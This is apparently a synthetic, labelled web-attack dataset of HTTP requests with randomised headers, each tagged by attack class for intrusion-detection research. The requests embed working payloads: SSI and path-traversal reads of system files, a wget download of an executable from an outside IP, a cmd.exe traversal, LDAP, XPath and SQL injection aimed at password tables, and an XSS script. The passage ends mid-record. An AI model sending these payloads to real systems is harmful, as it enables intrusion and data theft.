Authorization: NTLM bmxub0pkRHN3ZHRuYWlsYXJ0dXIzbm9udGNNNmlpcm9oaGlmcmVyNmVpZEFTc2ll
Range: 8-,-02
Referer: /nRazyoTd/etsfeszm/scoi.php3
TE: chunked,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/8.7 (Machintosh; U; Mac OS X 8.2; dh-iT; rv:1.9.3) Gecko/81002744
UA-CPU: PowerPC
UA-Disp: 665,2462,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 893x680
Via: 3.8 40.37.223.23, fenf/3.4 www.v9eom.htm, 0.6 67.70.172.248
Transfer-Encoding: gzip
Upgrade: ToKh/4.1, goe/9.9, moax/0.8
Warning: 301 www.aNxatsl.gif "mcn8ho5" "Mon, 26 Jan 09 23:46:07 CET"
X-Forwarded-For: 67.12.1.93
X-Serial-Number: 827844806951903095
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40064
Start - Id: 39649
class: SSI
GET /dtltdiurhe/uMphJ1MwXjxrWBOXML/rMk/Fodeetz76lc85wsrey/iehh9itlSfyeinxiis/n4P-sRHRi/nLD8eF5oqZoLAG14.gif?4u=+t&tcaain=t3.6Yzetk%409&dveik=najmnaedt&efhee=%3C%21--++++%23include+virtual%3D%22%2Fetc%2Fpasswd%22+++--%3E&2Umeuteec=elgx%3Fhg%2FmvarHf&2edta0Iun=272&opuubencts=e+9o%5CIrx+&teeceia8imaawt=177390&smhcni=pmo&bTr7C9lIQ=ecy9 HTTP/1.0
Host: 217.165.28.208
Connection: csln53
Accept: */*;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: jrr=3rLoh
Client-ip: 193.240.238.168
Cookie: lgshtvo0=dzsu;stnp6ld=88865580;etete=ndrcpbino0;TaIhe=90265082
Cookie2: $Version="185"
Date: Thu, 09 Aug 07 06:25:35 CET
ETag: "Pte5BHI2KbP1-ib2"
Expect: 100-continue
From: lenzhrem@dasbEmim.st
If-Modified-Since: Wed, 18 Oct 06 15:51:51 GMT
If-Unmodified-Since: Fri, 20 May 05 08:22:40 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 863
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic MklyaW46dHI1dDV6b3A=
Authorization: Digest response="7990c8aD25A18B6bFB7a1D1BBAdb1e1f"
Range: 54-,0-33,3-74
Referer: /atrhr/vbi4/4aeshitt.cfm
TE: trailers,trailers,deflate
Trailer: Authorization
User-Agent: Mozilla/8.9 (Machintosh; U; Mac OS X 0.2; dd-tm; rv:3.8.4) Gecko/55555117
UA-CPU: PowerPC
UA-Disp: 749,540,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 587x0700
Via: HTTP/1.4 www.roev6g5.tiff:422, 6.0 25.68.186.172, FTP/3.2 33.252.128.169
Transfer-Encoding: aetp
Upgrade: o7s/5.6, dipl/2.7
Warning: 233 www.tttteg.htm "ttmdenotsrmsagg2nt4" "Mon, 21 May 07 21:20:21 CET"
X-Forwarded-For: 209.99.255.194
X-Serial-Number: 659531112
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39649
Start - Id: 43275
class: OsCommanding
GET /n2zlrtaeaodgt3/njNNz3/cEhekhnl/rqEyhQDgx/U2nannradcdL/3.ua@2/astrz4fAppboR/eu/37UUsetc/crpTlW-.Ds/s4MywrXKD.php3?acceptUVFzwCH=0m6YOP&te3EQtonFnyN=tDtP&th9hbgteuuerod=Hands9&Wee=anpn%3Bxlseval&woFg9RaNfJY=tln&v0e2eecsei=edaKYo42&wed=%5Cnwget++http%3A%2F%2F206.137.114.19%3A778%2Fnftp.exe&nsrrT=item3&SlI6=%25de%3C%3Dg8t%3C-e%2Bq&ins4bts9inl=uddocumenta%5Dls HTTP/1.1
Host: 168.120.114.160
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: iso-8859-1
Accept-Encoding: gzip;q=0.3
Accept-Language: *
Cache-Control: min-fresh=09
Client-ip: 199.96.226.205
Cookie: eg=8i;meta7CA=i-HF;iOsystem7Vm=wntdo5&9e;emleygdrcnRt=67258735;lrt=wftphopens;guetaoasns7=uhsfni0ct
Cookie2: $Version="51"
Date: Sat, 08 Aug 09 05:49:17 UTC
ETag: "z_5BfkhKaV82SwEk57_"
Expect: b1t3F5ik=ccEnhleR;tysne=masht6
From: litow@dtisn.uk
If-Modified-Since: Sun, 18 Jul 04 11:02:48 UTC
If-Unmodified-Since: Sat, 27 Jun 09 08:50:03 GMT
If-Match: *
If-None-Match: "i6IRoZvzAP90gAs3PG"
If-Range: *
Max-Forwards: 4038
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Digest response="0B3cEb0aBbFc900Db7cC68fE50d55Ca6"
Authorization: mtat GoltfEre=elAxoea
Range: 6444-90250,-039,9-0896
Referer: http://www.atSzl.uk/npeab1/earod8/rloc.tiff
TE: trailers,trailers
Trailer: Range
User-Agent: Mozilla/4.8 (Windows; U; WinNT 2.7; m3-hd; rv:1.3.3) Gecko/44443435
UA-CPU: 68000
UA-Disp: 649,3130,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 478x271
Via: 7.9 www.zm0t.tiff:79
Transfer-Encoding: compress
Upgrade: tbvt2/4.8, iobdph/8.7, ciose/9.7
Warning: 824 77.211.235.51 "cihtsshy" "Wed, 01 Mar 06 07:42:35 UTC"
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 9975739043069
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43275
Start - Id: 39050
class: LdapInjection
POST /sse8rtglftlnn11tev/uQKx/sosnaltiic/5xjVM9AW84r.5NoC-v8/mWQKS./uHYBRh@Vg_x/b1sNzsrheoe/j_.mdb? HTTP/1.1
Content-Length: 12
Content-Language: h2eOlT1,wrd
Content-Encoding: compress
Content-Location: /nEedjr5/ohic.exe
Content-MD5: VGdudGRhbG9zemtlMEVuNw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 31 May 08 05:32:22 UTC
Last-Modified: Thu, 08 Feb 07 10:42:09 CET
Host: 103.233.158.53
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: oao4NHe=cre5et8a
Cookie: 6vMCgOVu3=ph
Cookie2: $Version="315"
Date: Mon, 10 Dec 07 18:00:53 CET
ETag: W/"3cB9HlpJ4rG0odJ"
Expect: nt9qbtya
From: mnr2@yerlneae.net
If-Unmodified-Since: Sun, 10 Aug 08 15:04:55 CET
If-Match: "1@Do1E8rblvkmdL08ZXT"
If-None-Match: "6b-FFYV-bBSVFd@DI5"
If-Range: "0G6MMHGpRW651o1kjuK"
Max-Forwards: 95
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM eUMwSHQ5aENzb29hZWRUY2Flcmd3aHBlOGVleTBydGVkcmliaA==
Authorization: NTLM OHJwNnlpOGFpZXNhb2FhbXJldGRzZ3N2ZmlFZGFFbXJyZQ==
Referer: http://www.esEX23t.be/ssleou/1nHefa.msf
TE: deflate;q=0.9,gzip;q=0.4,trailers
Trailer: Referer
User-Agent: 65)(&(objectClass=t39t)(|(sn    =dta)(cn=o   J*))
UA-Color: color16
UA-Pixels: 3109x9976
Via: nut5/4.8 241.253.246.230, smi/0.0 www.ta6s.htm, ist/2.7 15.113.78.236
Transfer-Encoding: gzip
Upgrade: rfthn/1.0, tegk/3.0, esey/1.5, sfM1/8.0
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

netdn=730653

End - Id: 39050
Start - Id: 38378
class: LdapInjection
GET /sAHorjo7voKADvU/rs/tse/kDkIP/zyFvmRu/tfCXtVE0yVKrFEJ@8bR/zhCeothfeir3Dah7yna/lloObtedinfTpaRe/ntjoraaf0da/lQobjUgrrmbIWr7D/stXw2oDbRu1Yv5afP.exe?eTskeeunkd=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&Cmos=ndocumentj++o%26%3Fo+nsdti&oimoesoe5th3s=x HTTP/1.1
Host: 118.163.227.38
Connection: rghii
Accept: image/*, video/mpeg, audio/*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: e4foos-9pnsl, ure9ghnr-er
Cache-Control: min-fresh=95476
Client-ip: 41.189.98.25
Cookie: 6positionn_VIFcRa=33;oiaPeim1=rlTPomeyetcG;aeldsHnabplist=w4
Cookie2: $Version="590"
Date: Mon, 08 Sep 08 15:44:05 UTC
ETag: "_tbcCy0@wz8M8jd"
Expect: 100-continue
From: frlm@ctsi1ez.ch
If-Modified-Since: Tue, 27 Jul 04 24:52:40 UTC
If-Unmodified-Since: Wed, 04 Nov 09 20:13:54 CET
If-Match: "x3Veeu-2SRCXR1YS"
If-None-Match: "R5ZZJVhLoN@M3O@iXD"
If-Range: Thu, 05 May 05 17:23:06 UTC
Max-Forwards: 7438
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic c2dsb2VzOmx0c2NCNHM=
Range: -0,582766-
Referer: http://yeAsgewc.fr/ymFnwSa3/dcap/osfthr.pdf
TE: gzip;q=0.1,trailers
Trailer: Referer
User-Agent: sgsolan/1.3.4.3
UA-CPU: 68000
UA-Disp: 6597,6108,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 554x9666
Via: FTP/0.6 www.ydydaett.shtml:7476
Transfer-Encoding: deflate
Upgrade: rysE/9.0, mt3/0.2, 84ag/2.9
Warning: 306 www.u4zhxszn.shtml "rahmw" 
X-Forwarded-For: 18.81.134.210
X-Serial-Number: 85165873223938
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38378
Start - Id: 37438
class: LdapInjection
GET /2trsriAeldyh.mdb?asayraerpr7resr=olefcva&rb69BhWaderaeaq=cahOa%3F%25ePor&W9GmV=6hut&oviHeas9oahs=sfobjectahxml%24ue&rmia=44556630&qbwupdatesC=772561&hNroiylWo2zof=nkoi%3Fto%24ulssmloon8&2tSrnEaxHpn=00&ge9tpaeske=s1nAdHBd&oupshr8w=oox%3AttN HTTP/1.1
Host: www.ea06l66b.uk:9681
Connection: dtthAa
Accept: audio/x-wav;q=0.0
Accept-Charset: iso-8859-7;q=0.3, iso-8859-5;q=0.5, utf-8, hz-gb-2312, iso-2022-jp;q=0.8
Accept-Encoding: *
Accept-Language: 9i7-hrrehsc;q=0.9, l-hr
Cache-Control: no-transform
Client-ip: 60.96.119.253
Cookie: wstarntlttic=)  (|(displayName=had*)   (name=had*)(mail=had* )
Cookie2: $Version="8"
Date: Sat, 07 Nov 09 23:21:59 GMT
ETag: "tAcpyk7tvvbb5XYUcZ"
Expect: 100-continue
From: arSeni@esqqy2etgc.cz
If-Modified-Since: Mon, 14 Jul 08 05:29:05 GMT
If-Unmodified-Since: Mon, 16 Jan 06 11:42:38 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 10 Jul 09 17:10:06 CET
Max-Forwards: 4385
MIME-Version: 0.7
Pragma: noUt='eltyiren'
Proxy-Authorization: nlct tngmes=oZoE0u
Authorization: dmebee SaimiSea=ocde
Range: 204745-
Referer: http://ycoyx.biz/r2eNea7/3SnlrlL/o9HEnvt/npi7cir/ngubEes.bin
TE: trailers
Trailer: Trailer
User-Agent: pazetkoiiTr1hbu
UA-CPU: x86
UA-Disp: 9236,912,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7873x595
Via: 9.0 136.162.52.31
Transfer-Encoding: identity
Upgrade: srec/2.4, wspc/1.9
Warning: 379 223.54.79.69 "izotholigaL" 
X-Forwarded-For: 218.58.31.100
X-Serial-Number: 973264
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37438
Start - Id: 35834
class: XPathInjection
GET /wxaw/xtermeQusr_F/halaoembyeeydfchei/hnqakVzqSE@/luLV.CW67/74IM/UQO/aFwJ_/euettneion6BHswi/sc.css?rt7ytfe5loeoe=enGnroee%27++or++++6++++%3C++++count%28path%2Fchild%3A%3A*%29++++or++%2738jniS%27+%3D++++%27&lon1FaLOer3I=duntteso5h HTTP/1.0
Host: www.hcakR.de
Connection: hdrlq
Accept: */*;q=0.5
Accept-Charset: cp-950, euc-tw, euc-jp, iso-2022-kr;q=0.3, x-mac-greek;q=0.1
Accept-Encoding: *
Accept-Language: uwh-hExc0A, t-4sf, hi9-diaw;q=0.2, duhrntm-sd, etMw-achueoc;q=0.8
Cache-Control: max-age=23693
Client-ip: 48.181.108.67
Cookie: rtbhesl=et2irxr2hgsmew7hMX;sk=l 5a);hyeSoe='uce o nEre;hs9tnma=r?c@;iAughsa=4;ea=akW@57JLwM
Cookie2: $Version="003"
Date: Tue, 18 Mar 08 20:43:42 GMT
ETag: "mUWr_rP0r53hp.28cK@"
Expect: saaE
From: t6Hzyl@dtgtOents.biz
If-Modified-Since: Tue, 29 Jan 08 06:52:09 UTC
If-Unmodified-Since: Wed, 17 Feb 10 24:54:29 GMT
If-Match: *
If-None-Match: "RpNIqkI9L_fw.d4uOhBh"
If-Range: "CPtSW96gANhgTA4m8@W"
Max-Forwards: 36
MIME-Version: 8.2
Pragma: f='illiak'
Proxy-Authorization: Digest username="ey5ng"
Authorization: Digest opaque="ptan"
Range: 77-,-9
Referer: http://www.dani.gov/hnagr/eeNtr.tiff
TE: chunked,deflate;q=0.7
Trailer: Connection
User-Agent: nnhotrxetoairrCAysn
UA-CPU: MIPS
UA-Disp: 747,476,16
UA-OS: Linux
UA-Pixels: 4135x5853
Via: 5.0 78.151.251.170:4, wAaoeh/6.2 196.167.138.81
Transfer-Encoding: identity
Upgrade: oyytm/9.6, hhc/4.5, Ojwace/7.1, toww7E/9.4
Warning: 198 www.toldzft.js "aieysaloeRmyhanfuas" "Wed, 06 Aug 08 03:23:52 GMT"
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 9668656404576
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35834
Start - Id: 45812
class: PathTransversal
GET /c5OmailE.XGzOb3-I/pi7R6GTKu4GRWJzz/m4HiNx43tZyEjKuD/yseal2jhitPe.css?et4fv2sost=+%40%3D+ttbok+wp-%3E+lsc&iiaaxr1e=kzmyhlnswnon7h&UO@HK8=ld%7Coallooa&wt=yRi4lLAF+w%29&ne=98uyacac3hiefslna&y@uMXuB3eRinputF=tff0n3eahrp5i%3Fo&est5llaqz=cet2m4&hirr4r=604665&RSOwEWevSH=158029&ppaeeewoigdu=e2ae5h%40seOrp&yesioau=%5Cautoexec.bat&dl=642138&enereaAiue=sbnl%5CeM%7CkesystemSta&qe7qrsndZarme=10 HTTP/1.1
Host: www.dleali.cz:80
Connection: tsch
Accept: */*;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: gzip, deflate;q=0.7, compress;q=0.2
Accept-Language: *;q=0.3
Cache-Control: min-fresh=046
Client-ip: 241.101.131.168
Cookie: 9et=871;ulmie0nr=t5hY
Cookie2: $Version="27"
Date: Sun, 04 Jan 09 15:45:18 UTC
ETag: "RXzBxEUPj84ka@n1rH"
Expect: 100-continue
From: rpAl@yhsq9eT1.st
If-Modified-Since: Wed, 10 Feb 10 07:16:51 UTC
If-Unmodified-Since: Sat, 30 Jan 10 21:02:28 CET
If-Match: *
If-None-Match: "la8MYH_M63Ew4HEX"
If-Range: *
Max-Forwards: 0
MIME-Version: 4.8
Pragma: tiyrnu='ee8cq'
Proxy-Authorization: NTLM UGFBdGk4c3ZhNWk0b290ZXRodGVvb2N0UzFtT2lveXJvc2Ru
Authorization: Enne e6ota=ceehpe
Range: 2-5,-391
Referer: /acnr/sHu0nets.css
TE: trailers
Trailer: Host
User-Agent: ewswstnea (iOljWCWwPe; tK83@@xfJu; 4bIAdS8; pQgap2)
UA-CPU: PowerPC
UA-Disp: 742,2997,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9422x259
Via: HTTP/0.7 135.85.253.30
Transfer-Encoding: aglu
Upgrade: T7eg/6.6
Warning: 146 www.lsdhDul.jpeg "nnetelfllaw8" 
X-Forwarded-For: 20.38.1.164
X-Serial-Number: 97437776345
----: ---------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45812
Start - Id: 36371
class: PathTransversal
PUT /reteraoi8/SVupdateallW/eoHwmeemr/Usliiea6otNss1rkswo/0Nnbekau/o_DuLd_Cc/tzptolhqahie/JJnetcatdGOP_V/0dUq/bsvsn/bhtl/s5fe.msf? HTTP/1.0
Content-Length: 131
Content-Language: a,K4ese,es
Content-Encoding: deflate
Content-Location: http://7r4iois.de/8ttn/O5dsa/hynm2iF/a2ruo/aims.tiff
Content-MD5: OW1wYWpzZWxlZDZhdHJyMA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 21 Apr 08 15:53:28 GMT
Last-Modified: Thu, 22 Feb 07 11:19:39 CET
Host: www.cigl.st:55020
Connection: Ndmle3e
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: ../../../../var/log/access_log%00.html
Cache-Control: only-if-cached
Client-ip: 29.81.100.75
Cookie: eyEstsatavsu=5eIrcnsctzks5;Qipfu=rr;i1krE0i6cc6iems=eorE oosej:r;XZcSQJbaJktelnet=P0ds|
Date: Mon, 05 Mar 07 18:32:54 CET
ETag: "H4J8g.cZTpa9B@snID5"
From: Aoaosc@siTjrurTs7.biz
If-Modified-Since: Mon, 04 Jan 10 01:24:07 GMT
If-Unmodified-Since: Tue, 09 Feb 10 03:36:42 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 03 Oct 07 14:38:14 CET
Max-Forwards: 739
Referer: /ilda1n/iimoxa/2ayihe/smod/oEBaa.jpeg
TE: trailers
Trailer: Range
User-Agent: Mozilla/7.9 (Windows; U; Win 9x 1.3; tA-aO; rv:5.7.8) Gecko/95949965
Via: 1.8 www.a8bCli.jpg, FTP/3.8 252.224.140.19
Transfer-Encoding: identity
Warning: 034 227.48.27.226 "enhbna" "Sat, 27 Mar 04 14:55:48 GMT"
----: ----------------------

jde2nhO=i]bo&inIcUsoucccne8=unAjTGAn5&ouclDoistoO=2598&uoUrHBtbiTpssb=081&snyt=c0eh6Qea&naeb0GntuaLyaEN=nQr&nhrsu=270033&iyvhr=ne

End - Id: 36371
Start - Id: 36439
class: OsCommanding
GET /file.bat/..��..��..��winnt/system32/cmd.exe/c dir C:georgi.asp/..��..��..��file.ext? HTTP/1.0
Host: www.aremaeth.be:6
Connection: keep-alive
Accept: image/jpeg;q=0.1, text/*, audio/*;q=0.2
Accept-Charset: windows-1257;q=0.3, windows-1253;q=0.4
Accept-Encoding: deflate, gzip, identity;q=0.7, deflate
Accept-Language: hIfaei-ot6d, 3tyoeS-eeaqh;q=0.5, omccshv-bmuE
Cache-Control: no-transform
Client-ip: 193.70.10.128
Cookie: tnEeRdl=602662574
Cookie2: $Version="5"
Date: Fri, 19 Mar 04 18:37:23 GMT
ETag: W/"u4HtIBSrU_SJ2Q3p6Q"
Expect: ajatsei7=hn7Hs
From: ghijiO@Fsrajafric.com
If-Modified-Since: Sun, 23 Jul 06 16:03:01 CET
If-Unmodified-Since: Fri, 01 Jun 07 07:04:52 GMT
If-Match: "x3zDIVX.39-Dxmjoaf"
If-None-Match: *
If-Range: Sun, 15 Jan 06 14:30:56 CET
Max-Forwards: 90
MIME-Version: 0.7
Pragma: c2fqred=Ddnj
Authorization: esyEx nttyicer=syse
Range: 51-
Referer: http://www.pirohtn.cz/t1ls/eifcA/i57ini/a4id/Tsah.asmx
TE: deflate,trailers,chunked;q=0.8
Trailer: Trailer
User-Agent: Mozilla/2.7 (Machintosh; U; Mac OS X 1.2; oC-tT; rv:8.7.5) Gecko/01987496
UA-CPU: PowerPC
UA-Disp: 5073,578,16
UA-Color: color32
UA-Pixels: 006x6469
Via: ran/7.4 www.ml9ocat.jpeg, 7.0 www.ebswlm.jpeg
Transfer-Encoding: gzip
Warning: 176 3.53.123.242 "nltteLtvtattssrC" 
X-Forwarded-For: 113.116.65.59

null

End - Id: 36439
Start - Id: 42344
class: SqlInjection
GET /Pa6hutiemv9eRyrgmkAs/syesw/lgh1ehuoinuedhyadsde/sudehAtDtt7/to/918JM7v8O2G/meM4MS_9d_Ijmg/HfromGaDIRWprocessing-instructionyU/kftpLL4wqB6.js?soc3eorgau0eoti=+&xJPkFs2=%27union++++select++++PASSWORD+++from++++DBA_PASSWORD%3B--&rtte=+Aomorle&ssInthaCLimwOs=62531&dlaiihruw=rd%3Fmocha5&F4samOh=026&p2SCM=u8en+&7egElcn=nlpassthrun%5D&jm9tj6=amrol0tb HTTP/1.1
Host: www.RooaE.cz
Connection: keep-alive
Accept: image/*, image/*
Accept-Charset: *
Accept-Encoding: compress, compress, identity
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 234.69.56.127
Cookie: likeuM8D=9250156;8tirCslhofs=qtiWeie4(;ttypo=140058;pDirveiwgans=r-B-8Kv9tN;sGrf=ih(mnt5|il8fetcs0siAo
Cookie2: $Version="054"
Date: Thu, 19 Oct 06 23:19:29 GMT
ETag: W/"W3Dl8Wik9y5E8q13ewRG"
Expect: 2umiebtT=nsiyaDcL;shjh=2fwn
From: 9quNt@ct6Iewpcw4.cz
If-Modified-Since: Mon, 25 Dec 06 20:32:14 CET
If-Unmodified-Since: Tue, 07 Sep 04 09:19:21 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 09 Jul 08 24:27:17 UTC
Max-Forwards: 375
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: nrRny etsaey=elewdabt
Authorization: baldw 1aneseaa=tt40ou
Range: -42018,-510767
Referer: /auethe/phen.jpg
TE: gzip;q=0.6
Trailer: Proxy-Authorization
User-Agent: tathrtfrre
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 999x243
Via: 5.6 www.ne60Iht.tiff
Transfer-Encoding: identity
Upgrade: kndair/4.7, ioi3/3.6, wewro/6.2, olctl/7.3
Warning: 478 44.68.67.163:8 "haHdehmpgh" 
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 71261
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42344
Start - Id: 45946
class: PathTransversal
GET /a9SfhewQc.9JubtVdLQK/vqckEYflyeroe/stding0Y/y8Q/aiF@yFNbbYwo0P09UH/f3jUfwK.M@0vxie/c4Rrs/XeROnEU6/Jj3k.6KyiframeLn-.png?t8ugndOkee=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&6zheaf=052065 HTTP/1.0
Host: www.rrghb.gov:80
Connection: close
Accept: */*
Accept-Charset: windows-1250, koi8-r
Accept-Encoding: *
Accept-Language: otehh-rdaH, seenrnv9-dia7a9y;q=0.6, toge-in0s;q=0.9, t-yios0;q=0.9
Cache-Control: max-age=9
Client-ip: 81.34.102.44
Cookie: lyThsycaoua=achildeiQ3eval;lerree=56417288
Cookie2: $Version="94"
Date: Thu, 24 Nov 05 13:30:19 UTC
ETag: "AmOHLdvP-_8yZewe"
Expect: n0tyeio
From: cpanabu8@leeWhlh.biz
If-Modified-Since: Sun, 15 Jan 06 24:41:05 CET
If-Unmodified-Since: Sat, 08 Jul 06 21:39:45 GMT
If-Match: "B@Z.uCN7BzHqczzisl"
If-None-Match: "8.XDWPTwApOF2QH4@E"
If-Range: "enIa8c8JzhHcd8-"
Max-Forwards: 11
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: atacrJ nOIndN=dosn6sfe
Authorization: Hh8ljl hkHpI=asiyO
Referer: /ceresA/raotr1q/uharsoA.avi
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: yntoXote
UA-CPU: PowerPC
UA-Disp: 3135,8994,8
UA-OS: Windows NT
Via: FTP/9.7 www.thn8lee.tiff, 0.2 www.uOmemdlm.css:25, HTTP/3.2 4.20.168.80:369
Transfer-Encoding: gzip
Upgrade: Eih/5.7, olse/5.3, eieecn/0.8
Warning: 240 244.77.211.173 "osnMh" 
X-Forwarded-For: 226.91.8.34
X-Serial-Number: 15666151508879935432
----: -----------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 45946
Start - Id: 36169
class: PathTransversal
GET /rPWif0QK/eeohrnEiuodTrymoayLi/kWL/t8nC9G@l7Z/en3tahxt8cdud7gro/elzlpl2r/oaeHgaktybwa/ugr2/nBts8yeopyaaieluu/scriptef/Ty7e6/mh3ed0e1tel.php?eservicesH1BNMi=sT&8zeldludA=d%3A%5Cautoexec.bat&ezaiin=t%29 HTTP/1.0
Host: www.toai7hii1.be
Connection: ttmpz
Accept: video/mpeg;q=0.2
Accept-Charset: euc-kr;q=0.2, iso-8859-4, x-mac-arabic;q=0.9, isiri-3342, windows-1252;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 164.195.241.61
Cookie: ddnqtAhtmauphpa=bt;cyoe1maddtaimr=(h/ealysdeconnect1;rek5r898d=116387;tipoxdtr=conh
Cookie2: $Version="892"
Date: Sun, 04 Mar 07 22:23:59 UTC
ETag: W/"Ur6v1GbQqi5Fpv3B_GUc"
Expect: ojnuth
From: esie@ntoatbni.fr
If-Modified-Since: Sat, 22 Nov 08 19:07:18 UTC
If-Unmodified-Since: Sat, 27 Dec 08 13:05:03 CET
If-Match: "EGDI1iL7va5h-td5ynew"
If-None-Match: *
If-Range: *
Max-Forwards: 16
Pragma: la=d6
Proxy-Authorization: Digest nonce
Authorization: Digest nc=b5e6dAC4
Range: 883-12,6163-,33622-
Referer: /jktslB/uabnns/msmd4f.txt
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/4.8 (Windows; U; Win 9x 2.0; ag-3s; rv:6.4.9) Gecko/35322917
UA-Disp: 4206,422,32
UA-Color: color32
UA-Pixels: 5546x388
Via: 7.8 27.46.195.168, 8.8 10.97.140.165, 1.0 127.166.226.111
Transfer-Encoding: compress
Upgrade: sBc8h/5.5, Lnio/4.6, olj9p/0.5
Warning: 176 103.233.4.139 "gothscr7a4n" 
X-Forwarded-For: 20.91.96.80
X-Serial-Number: 4255971850
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36169
Start - Id: 47687
class: XSS
GET /Wa.sock_streamwNy@pT9/onHzr1r2uVT7tCu6/ealkZprtzv/gb@49_BO2np/lZLadq5-fLE4nZcAX_9.jpeg?g63Gor.eUl=%3C%21--+--+--%3E%3Cscript++++%3E%5Balert+++%28%27cOttcirY%27%29%3B%5D%3C%2Fscript+++%3E%3C%21--+--+--%3E&Kenbtdaoo3exmni=43447564&uuilu8fiyiv8oq=ttelnet+B&asHca=8275186 HTTP/1.0
Host: 130.226.110.43
Connection: tttnn
Accept: application/x-tar
Accept-Charset: cp-950
Accept-Encoding: compress;q=0.3, gzip;q=0.0, gzip, compress;q=0.4, identity
Accept-Language: *;q=0.1
Cache-Control: emaloo=m
Client-ip: 243.95.113.180
Cookie: Eomdthteiacdi=oE3tr5bin;1ok=e/uevusr etg
Cookie2: $Version="79"
Date: Sun, 22 Apr 07 19:55:48 CET
ETag: "6U3@g.r9YVe.JQCtdKWO"
Expect: 100-continue
From: maxEoc8e@ae6eyisrl4.biz
If-Modified-Since: Mon, 13 Feb 06 12:18:37 UTC
If-Unmodified-Since: Sat, 12 Dec 09 07:16:02 CET
If-Match: "GZpXPjgUThO8Eep"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: sxorov avcea=rose
Authorization: NTLM ZW9MOWdkZW55cmdubmlyZW1oZTlpZUFlbzhnNjMxbDgwaGVlSUlvd3h0bmxU
Range: 57-,235-9884,973-85
Referer: http://rdn4oT.gov/ebpe/ntin/y6ayneh.swf
TE: trailers,deflate;q=0.8,gzip;q=0.5
Trailer: From
User-Agent: Mozilla/4.6 (compatible; weqmiutde; Win98; asti0z9; 5lnj6n; ti5h)
UA-CPU: 68000
UA-Disp: 0445,5858,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 934x7117
Via: 5.3 www.l1tx7en.tiff:1036, Neege/1.9 www.n9ke.tiff:28, 9.0 194.87.40.114
Transfer-Encoding: compress
Upgrade: e33s9E/0.6
Warning: 797 10.182.112.205:62 "mparhiqesWqMnqIet2" 
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 6943669939
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47687
Start - Id: 49049
class: XPathInjection
GET /tadS/nM6ni.Du6PoORqf/tq3NP/D7tqgj5Lni3R/uswenexia/wS9tSpw6Qt6qhvbO/sMVS.Cxhe/tmpuRBinserthttpHmeta1/vIOKQiaIrcp.html?hn7unchmitirho=6cw+ee+lornd&nKt96Ab=osndsnbsrredjy&phpnq@C7fJ=+nw%25&New=vzKNETfSQ.&ad=7&lgt0csr6=%28i++%3C+count%28aibs%2Fchild%3A%3Atext%28%29%29+++++and+++++j+%3C+count%28rhok%2Fchild%3A%3Acomment%28%29%29+++++and+k+++%3C+++count%28nw9%2Fchild%3A%3A*%29+++%29&diopsqtth0=2&iy=ngl0 HTTP/1.0
Host: www.cmsj.org
Connection: close
Accept: */*
Accept-Charset: windows-1253
Accept-Encoding: 
